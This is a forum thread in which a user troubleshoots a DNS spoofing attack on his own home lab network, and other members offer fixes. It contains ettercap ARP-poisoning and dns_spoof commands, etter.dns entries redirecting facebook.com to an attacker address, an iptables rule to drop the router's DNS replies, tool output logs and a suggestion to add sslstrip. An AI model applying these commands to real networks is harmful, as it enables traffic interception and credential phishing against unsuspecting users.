DNS spoofing failing

[Ditio]

This is going to be my first post here but ive looked for the answer and found nothing.

My enviroment is as follows:
Target box, macbook pro running snow leopard.(192.168.1.78)
Attacker Acer apire one running BT 5r3 with wireless network addapter (192.168.1.64).
both inside local network with 2wire router (192.168.1.254).

Im trying to do dns spoofing to redirect dns request (facebook) from target to local ip (192.168.1.64)

In my first attempts i used ettercap, y edited the etter.dns file as follows "*.facebook.com A 192.168.1.64" and then i run the command "ettercap -Tqi wlan1 -P dns_spoof -M arp /192.168.1.78/ /192.168.1.254/"
After that the verified that the man in the middle attack was working correctly as i could capture traffic between the target and the router.
However the dns spoof didnt work, target could enter facebook without trouble.

I rebooted the attacker computer with the native win7 and runned cain & abel. Started the sniffer, selected the target, modified the arp-dns, poisoned, and even though i got full routing the spoofing continued failing.

I switched machines making the apire one the target and booted my macbook with BT 5r3 live CD. did the same procedure and failed.

I seem to be unable to the the dns spoofing and i want to know why

So my question would be: What im i missing? What changes do i need to perform? do i need to modify my network settings?

Thank you all for your help.
I searched the forum for answer and even though there are several treads on this topic none addressed my problem as i seem to fail no matter what program (ettercap, c&a, dnsspoof, etc) i run.

[compaq]

Hi The router has probable cached the address and can server it up quicker than the attackers replies. You will have to wait 20mins approx without going to the site, or try some random url in ettercap before going to the site.

[Ditio]

I see, so the attacker would have to be quicker than the router? or is there other way? How can i corroborate that?
Ill try your suggestion and replay!
Thanks!

[Ditio]

Hey! thanks for the advise however it still doesnt work, although i got more info.
I modified the etter.dns like "* A 192.168.1.74" so as to redirect all requests to my attacker, not all pages worked however i typed a random site (blop.com) and it got redirected strangly i did it again (akash.com) and said that it couldnt find the host.
I tried spoofing other sites like wikipedia, grooveshark, gmail, hotmail and other popular websites without luck.

Could i reconfigure the router so it allows the attack?

Thanks!

[Ditio]

Sorry for multiple replys but im experimenting.

So i used ethernet with my attacker and got more results.
I also changed the etter.dns to say this:
facebook.com A 192.168.1.77
*.facebook.com A 192.168.1.77
www.facebook.com PTR 192.168.1.77

And the command in ettercap to redirect the traffic from all my network:
'ettercap -Tqi eth0 -P dns_spoof -M arp // /192.168.1.254/'


After that i got this errors, (although it says is spoofing my targets see no changes to their requests, they go to the real site):
dns_spoof: [es-la.facebook.com] spoofed to [192.168.1.77]
dns_spoof: [fr-fr.facebook.com] spoofed to [192.168.1.77]
dns_spoof: [pt-br.facebook.com] spoofed to [192.168.1.77]
dns_spoof: [de-de.facebook.com] spoofed to [192.168.1.77]
dns_spoof: [it-it.facebook.com] spoofed to [192.168.1.77]
dns_spoof: [ar-ar.facebook.com] spoofed to [192.168.1.77]
dns_spoof: [hi-in.facebook.com] spoofed to [192.168.1.77]
dns_spoof: [zh-cn.facebook.com] spoofed to [192.168.1.77]
dns_spoof: [ja-jp.facebook.com] spoofed to [192.168.1.77]
dns_spoof: [developers.facebook.com] spoofed to [192.168.1.77]
dns_spoof: [zh-cn.facebook.com] spoofed to [192.168.1.77]
dns_spoof: [ja-jp.facebook.com] spoofed to [192.168.1.77]
dns_spoof: [developers.facebook.com] spoofed to [192.168.1.77]
DHCP: [192.168.1.254] OFFER : 192.168.1.77 255.255.255.0 GW 192.168.1.254 DNS 192.168.1.254
dns_spoof: [zh-cn.facebook.com] spoofed to [192.168.1.77]
SEND L3 ERROR: 1591 byte packet (0800:06) destined to 192.168.1.78 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long)
)
SEND L3 ERROR: 1525 byte packet (0800:06) destined to 192.168.1.78 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long)
)
SEND L3 ERROR: 1525 byte packet (0800:06) destined to 192.168.1.78 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long)
)
SEND L3 ERROR: 1525 byte packet (0800:06) destined to 192.168.1.78 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long)
)
dns_spoof: [ja-jp.facebook.com] spoofed to [192.168.1.77]
dns_spoof: [developers.facebook.com] spoofed to [192.168.1.77]
DHCP: [192.168.1.254] ACK : 192.168.1.77 255.255.255.0 GW 192.168.1.254 DNS 192.168.1.254 "gateway.2wire.net"
dns_spoof: [ja-jp.facebook.com] spoofed to [192.168.1.77]
DHCP: [192.168.1.254] ACK : 192.168.1.77 255.255.255.0 GW 192.168.1.254 DNS 192.168.1.254 "gateway.2wire.net"
dns_spoof: [developers.facebook.com] spoofed to [192.168.1.77]
SEND L3 ERROR: 2932 byte packet (0800:06) destined to 192.168.1.78 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long)
)
SEND L3 ERROR: 1593 byte packet (0800:06) destined to 192.168.1.78 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long)
)

[compaq]

You could try dropping packets from the router "iptables -A INPUT -p udp --srcport 53 -src 192.168.1.1 -j DROP", to see if its repliing first.

[DigitalV]

I had a similar issue with what you were experiencing with ettercap and dns spoof.. this is what I did in my etter.dns to fix it:


facebook.com A attacker.ip.here
*.facebook.com A attacker.ip.here
www.facebook.com PTR attacker.ip.here

After that, it worked like a charm - not sure if yours was the same issue, but it worked for me.

Also - for me I found out that (which is not your case) using VirtualBox to Regular PC broke it for me as well.. The attack would however work from PC to PC and sometimes from VM (VBOX) to VM (VBOX)

Hope that helps!

-DV

[Ditio]

facebook.com A attacker.ip.here
*.facebook.com A attacker.ip.here
www.facebook.com PTR attacker.ip.here

-DV

Thank you for the tip, however that is exactly what i did, i havent managed to make it work yet, however i belive i has something to do with my pc specs... i tried also modifying the etter.conf to run it like root and use ip tables.

i realy dont understand where is the problem...

I did however foundout that while facebook.com doesnt get redirected developers.facebook.com does. My account runs with https (ssl) so perhaps there is a way to use sslstrip with ettercap together...
although i dont know how to do that...
Other thing is that changing the spoofed site to www.bopibloop.com which actually doesnt exists still doesnt get redirected...

Ill keep reserching and post a solotion if i find one.

[compaq]

Hi Ditto
with this, can you try ifconfig eth0 mtu 1700 up
"SEND L3 ERROR: 1525 byte packet (0800:06) destined to 192.168.1.78 was not forwarded (libnet_write_raw_ipv4(): -1 bytes written (Message too long)
)"

[Ditio]

Hey! sorry for the delay in answering...
There has been no progress but im inclined to belive this is has to do with the modem.
Ill try other methods for dns spoof
Ill write back when i figure it out, however i would apreciate suggestions